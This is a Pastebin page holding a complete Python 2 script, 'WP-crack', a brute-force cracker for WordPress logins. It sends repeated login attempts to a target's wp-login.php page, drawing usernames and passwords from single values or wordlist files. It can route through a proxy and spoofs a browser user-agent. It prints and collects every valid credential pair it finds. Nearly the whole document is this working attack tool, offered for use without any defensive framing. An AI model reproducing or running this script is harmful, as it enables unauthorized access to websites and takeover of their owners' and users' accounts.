Guest User

[Python] Wordpress BruteForce | Nabilaholic404

a guest
Nov 4th, 2013
4,528
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. import sys
  4. import urllib2, urllib
  5. import cookielib
  6. import re
  7.  
  8. #
  9. #functions
  10. #
  11.  
  12. def loadLst(fileName, lstName):
  13.     f = open(fileName, 'r')
  14.     for line in f:
  15.         lstName.append(line.replace('\r\n',''))
  16.     f.close()
  17.  
  18. if len(sys.argv) <= 1:
  19.     print 'WP-crack v1.0 (c)2012 by Zonesec - a very fast logon WordPress Cracker'
  20.     print 'Website: http://www.zonesec.com'
  21.     print 'Mail   : zonesec@gmail.com'
  22.     print ''
  23.     print 'Syntax: python WP-crack [-u USER|-U FILE] [-p PASS|-P FILE] -h URL [OPT]'
  24.     print ''
  25.     print 'Options:'
  26.     print '-h URL'
  27.     print '-U file contain list user'
  28.     print '-P file contain list password'
  29.     print '-u username'
  30.     print '-p password'
  31.     print '-v verbose mode / show login+pass combination for each attempt'
  32.     print '-f continue after found login/password pair'
  33.     print '-g user-agent - default: "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"'
  34.     print '-x use proxy | ex: 127.0.0.1:1234'
  35.     print ''
  36.     print 'Examples: python WP-crack.py -h http://test.com/wp-login.php -u admin -P password.txt'
  37.     sys.exit()
  38.  
  39. print 'WP-crack 1.0 (c)2012 by Zonesec - a very fast logon WordPress Cracker'
  40. print 'Website: http://www.zonesec.com'
  41. print 'Mail   : zonesec@gmail.com'
  42.  
  43. #
  44. #define variables
  45. #
  46.  
  47. print ""
  48.  
  49. url = ''
  50. wordlist = ''
  51. username = ''
  52. password = ''
  53. passFile = ''
  54. userFile = ''
  55. signal = 'type="password"'
  56. count = 0
  57. countAcc = 0
  58. mode = 1
  59. verbose = 0
  60. useProxy = 0
  61. continues = 0
  62. agent = 'Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0'
  63. result = ""
  64.  
  65.  
  66. #
  67. #check argvs
  68. #
  69. for arg in sys.argv:
  70.     if arg == '-h':
  71.         url = sys.argv[count + 1]
  72.     elif arg == '-u':
  73.         username = sys.argv[count + 1]
  74.     elif arg == '-U':
  75.         userFile = sys.argv[count + 1]
  76.     elif arg == '-p':
  77.         password = sys.argv[count + 1]
  78.     elif arg == '-P':
  79.         passFile = sys.argv[count + 1]
  80.     elif arg == '-v':
  81.         verbose = 1
  82.     elif arg == '-s':
  83.         signal = sys.argv[count + 1]
  84.     elif arg == '-g':
  85.         agent = sys.argv[count + 1]
  86.     elif arg == '-x':
  87.         lstTmp = sys.argv[count+1].split(':')
  88.         proxyHandler = urllib2.ProxyHandler({lstTmp[0] : lstTmp[1]+':'+lstTmp[2]})
  89.         useProxy = 1
  90.     elif arg == '-f':
  91.         continues = 1
  92.     count += 1
  93.  
  94.  
  95. if (len(username)>0 and len(password)>0):
  96.     mode = 1 #single
  97. elif (len(username)>0 and len(passFile)>0):
  98.     mode = 2 #
  99. elif (len(userFile)>0 and len(password)>0):
  100.     mode = 3
  101. elif (len(userFile)>0 and len(passFile)>0):
  102.     mode = 4
  103.  
  104. #
  105. #init opener
  106. #
  107. cookieJar = cookielib.CookieJar()
  108. cookieHandler = urllib2.HTTPCookieProcessor(cookieJar)
  109. if useProxy == 0:
  110.     opener = urllib2.build_opener(cookieHandler)
  111. else:
  112.     opener = urllib2.build_opener(proxyHandler,cookieHandler)
  113. opener.addheaders = [('User-agent', agent)]
  114. cookieJar.clear()
  115. cookieJar.clear_session_cookies()
  116.  
  117. #
  118. #main
  119. #
  120. try:
  121.     response = opener.open(url)
  122.     content = response.read()
  123.     if mode == 1:
  124.         values = {'log' : username,
  125.                       'pwd' : password,
  126.                       'wp-submit' : 'Log In',
  127.                       'redirect_to' : '',
  128.                       'testcookie' : '1' }
  129.         data = urllib.urlencode(values)
  130.         print data
  131.         response = opener.open(url+'/', data)
  132.         strTmp = response.read()
  133.         if strTmp.find(signal) < 0:
  134.             countAcc += 1
  135.             result += "username: " + username + "   password: " + password + "\n"
  136.             print "Valid user--pass: " + username + " -- " + password
  137.             f3 = open('test.html','w')
  138.             f3.write(strTmp)
  139.             f3.close()  
  140.            
  141.    
  142.    
  143.     if mode == 2:
  144.         f = open(passFile,'r')
  145.         for line in f:            
  146.             password = line.strip('\n\r')
  147.             values = {'log' : username,
  148.                       'pwd' : password,
  149.                       'wp-submit' : 'Log In',
  150.                       'redirect_to' : '',
  151.                       'testcookie' : '1' }
  152.             if verbose == 1:
  153.                 print "Trying u--p     : " + username + " -- " + password            
  154.             data = urllib.urlencode(values)
  155.             try:
  156.                 response = opener.open(url+'/', data)
  157.             except urllib2.URLError, e:
  158.                 continue
  159.             strTmp = response.read()
  160.             if strTmp.find(signal) < 0:
  161.                 countAcc += 1
  162.                 result += "username: " + username + "   password: " + password + "\n"
  163.                 print "Valid user--pass: " + username + " -- " + password                
  164.                 break;
  165.          
  166.  
  167.  
  168.     if mode == 3:
  169.         f = open(userFile,'r')
  170.         for line in f:
  171.             username = line.strip('\n\r')
  172.             values = {'log' : username,
  173.                       'pwd' : password,
  174.                       'wp-submit' : 'Log In',
  175.                       'redirect_to' : '',
  176.                       'testcookie' : '1' }
  177.             if verbose == 1:
  178.                 print "Trying u--p     : " + username + " -- " + password
  179.             data = urllib.urlencode(values)
  180.             try:
  181.                 response = opener.open(url+'/', data)
  182.             except urllib2.URLError, e:
  183.                 continue
  184.             strTmp = response.read()
  185.             if strTmp.find(signal) < 0:
  186.                 countAcc += 1                
  187.                 result += "username: " + username + "   password: " + password + "\n"
  188.                 print "Valid user--pass: " + username + " -- " + password                
  189.                 if continues == 0:
  190.                     break
  191.                 cookieJar.clear()
  192.                 cookieJar.clear_session_cookies()
  193.                 response = opener.open(url)
  194.                 content = response.read()
  195.  
  196.                
  197.        
  198.     if mode == 4:
  199.         f = open(userFile,'r')
  200.         f2 = open(passFile,'r')
  201.         for line in f:
  202.             username = line.strip('\n\r')
  203.             f2.seek(0)
  204.             for line2 in f2:
  205.                 password = line2.strip('\n\r')
  206.                 values = {'log' : username,
  207.                       'pwd' : password,
  208.                       'wp-submit' : 'Log In',
  209.                       'redirect_to' : '',
  210.                       'testcookie' : '1' }
  211.                 if verbose == 1:
  212.                     print "Trying u--p     : " + username + " -- " + password
  213.                 data = urllib.urlencode(values)
  214.                 try:
  215.                     response = opener.open(url+'/', data)
  216.                 except urllib2.URLError, e:
  217.                     continue
  218.                 strTmp = response.read()
  219.                 if strTmp.find(signal) < 0:
  220.                     countAcc += 1                    
  221.                     result += "username: " + username + "   password: " + password + "\n"
  222.                     print "Valid user--pass: " + username + " -- " + password                    
  223.                     if continues == 0:
  224.                         break;
  225.                     cookieJar.clear()
  226.                     cookieJar.clear_session_cookies()
  227.                     response = opener.open(url)
  228.                     content = response.read()
  229.                    
  230.         f.close()
  231.         f2.close()    
  232.        
  233.     #Finish
  234.     print ''      
  235.     print '1 target successfuly completed, '+ str(countAcc) +' valid username+password found'
  236.     print 'TARGER: ' + url
  237.     print 'RESULT:'        
  238.     print result
  239.     sys.exit()
  240. except urllib2.URLError, e:
  241.     print "\n\t[!] Session Cancelled; Error occured. Check internet settings"
  242. except (KeyboardInterrupt):
  243.     print "\n\t[!] Session cancelled"
RAW Paste Data